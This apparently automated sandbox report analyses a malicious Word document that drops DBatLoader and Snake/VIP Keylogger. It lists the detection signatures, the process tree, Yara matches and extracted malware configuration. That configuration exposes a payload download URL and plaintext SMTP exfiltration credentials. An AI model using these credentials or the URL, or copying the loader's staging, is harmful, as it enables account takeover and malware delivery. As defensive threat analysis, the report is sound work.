Edit tour

Windows Analysis Report
ENQ-0092025.doc

Overview

General Information

Sample name:	ENQ-0092025.doc
Analysis ID:	1585295
MD5:	3db6baf168cecc916012a59b6530175a
SHA1:	7d74c680b09f982271a50483ce350a5b3d9a0996
SHA256:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Tags:	docuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for sample

Office process drops PE file

Office process queries suspicious COM object (likely to drop second stage)

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 1892 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

brightness.exe (PID: 2072 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: 483AB6BD562B28782D0999ABEC4F57F5)

cmd.exe (PID: 6984 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 6396 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Aiymwhpj.PIF (PID: 1020 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 483AB6BD562B28782D0999ABEC4F57F5)

cmd.exe (PID: 6728 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 2228 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Aiymwhpj.PIF (PID: 3788 cmdline: "C:\Users\Public\Libraries\Aiymwhpj.PIF" MD5: 483AB6BD562B28782D0999ABEC4F57F5)

cmd.exe (PID: 4956 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jphwmyiA.pif (PID: 5476 cmdline: C:\Users\Public\Libraries\jphwmyiA.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2213632449.00000000022C6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000014.00000002.3410815376.0000000000B90000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3446215142.0000000027271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3410702228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000001.2321191405.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f402:$a1: get_encryptedPassword 0x3f3d6:$a2: get_encryptedUsername 0x3f49a:$a3: get_timePasswordChanged 0x3f3b2:$a4: get_passwordField 0x3f418:$a5: set_encryptedPassword 0x3f1e5:$a7: get_logins 0x3a832:$a10: KeyLoggerEventArgs 0x3a801:$a11: KeyLoggerEventArgsEventHandler 0x3f2b9:$a13: _encryptedPassword
00000008.00000002.2233031033.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.3410702228.0000000000C20000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000014.00000002.3410815376.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3410753000.0000000000B90000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000014.00000001.2400403863.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000010.00000001.2321191405.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f422:$a1: get_encryptedPassword 0x3f3f6:$a2: get_encryptedUsername 0x3f4ba:$a3: get_timePasswordChanged 0x3f3d2:$a4: get_passwordField 0x3f438:$a5: set_encryptedPassword 0x3f205:$a7: get_logins 0x3a852:$a10: KeyLoggerEventArgs 0x3a821:$a11: KeyLoggerEventArgsEventHandler 0x3f2d9:$a13: _encryptedPassword
00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80148:$a1: get_encryptedPassword 0x8011c:$a2: get_encryptedUsername 0x801e0:$a3: get_timePasswordChanged 0x800f8:$a4: get_passwordField 0x8015e:$a5: set_encryptedPassword 0x7ff2b:$a7: get_logins 0x7b578:$a10: KeyLoggerEventArgs 0x7b547:$a11: KeyLoggerEventArgsEventHandler 0x7ffff:$a13: _encryptedPassword
00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3446220044.000000002B461000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000001.2208904113.0000000000C20000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000014.00000001.2400403863.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000010.00000002.3410753000.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
